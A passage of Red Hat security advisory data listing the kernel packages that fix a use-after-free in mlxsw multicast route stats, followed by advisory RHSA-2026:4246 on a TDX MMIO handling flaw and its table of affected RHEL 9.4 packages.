"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats"
}
]
}
RHSA-2026:4246
Vulnerability from csaf_redhat - Published: 2026-03-11 01:14 - Updated: 2026-05-20 09:00A flaw was found in the Linux kernel. Userspace can deceive the kernel into performing MMIO (Memory-Mapped IO) operations in TDX (Trust Domain Extensions) on its behalf, allowing a #VE (Virtualization Exception) to be incorrectly handled as a in-kernel MMIO operation.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
Workaround
|
|
